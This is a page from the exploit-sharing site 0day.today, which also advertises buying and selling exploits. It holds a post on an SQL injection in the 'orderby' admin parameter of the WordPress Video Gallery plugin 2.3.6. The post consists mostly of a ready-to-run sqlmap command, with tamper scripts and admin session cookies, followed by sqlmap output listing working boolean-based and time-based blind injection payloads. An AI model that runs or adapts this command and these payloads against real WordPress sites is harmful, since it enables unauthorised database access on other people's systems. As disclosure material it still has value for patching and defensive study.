0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress Video Gallery - YouTube Gallery And Vimeo Gallery 2.3.6 SQL Injection Vulnerability
# Exploit Title: Wordpress Video Gallery - YouTube Gallery and Vimeo Gallery Plugin SQL Injection # Exploit Author: tmrswrr # Category : Webapps # Vendor Homepage: https://total-soft.com/wp-video-gallery/ # Version 2.3.6 1. **Access the Admin Panel:** - Navigate to the admin panel of your WordPress site. - Go to `TS Video Gallery > `Create ` > ` Use Theme` and save it. ``` 2. After save it back to TS Video Gallery Click title : https://localhost/wordpress/wp-admin/admin.php?page=tsvg-admin&orderby=TS_VG_Title&order=asc 3. Search for orderby parameter. ## SQLMAP COMMAND python3 sqlmap.py -u "https://localhost/wordpress/wp-admin/admin.php?page=tsvg-admin&orderby=TS_VG_Title&order=desc" --batch --dbms=mysql --thread 10 --no-cast --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 -p orderby --cookie="wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720346143|BXq7Kk6kWE6W8OhFfxRfE1vpFt00m9gRiPafjJPDU1N|0b78b25e2683d7f381967019db82b3f3fd9b06f1524ec128af92a74fe7c68e8f; \ wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720346143|BXq7Kk6kWE6W8OhFfxRfE1vpFt00m9gRiPafjJPDU1N|307f68044e4c2632757b13f86f770ceda3c9c7866a0b595b33a7a2f675224a15; \ wordpress_test_cookie=WP Cookie check; \ wp-settings-time-1=1720173805" --thread 10 ## RESULT sqlmap identified the following injection point(s) with a total of 1026 HTTP(s) requests: --- Parameter: orderby (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: page=tsvg-admin&orderby=(SELECT (CASE WHEN (1078=1078) THEN 0x54535f56475f5469746c65 ELSE (SELECT 2977 UNION SELECT 8545) END))&order=desc Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=tsvg-admin&orderby=TS_VG_Title AND (SELECT 6127 FROM (SELECT(SLEEP(5)))mIWx)&order=desc Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) --- [08:37:45] [WARNING] changes made by tampering scripts are not included in shown payload content(s) [08:37:45] [INFO] the back-end DBMS is MySQL [08:37:45] [PAYLOAD] (seLecT/**/(cAsE/**/WHen/**/(veRSIOn()/**/liKe/**/0x254d61726961444225)/**/ThEN/**/0x54535f56475f5469746c65/**/elSE/**/(seLecT/**/6685/**/UNiON/**/seLecT/**/9990)/**/End)) web application technology: Apache 2.4.54, PHP 8.0.23 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) # 0day.today [2024-09-19] #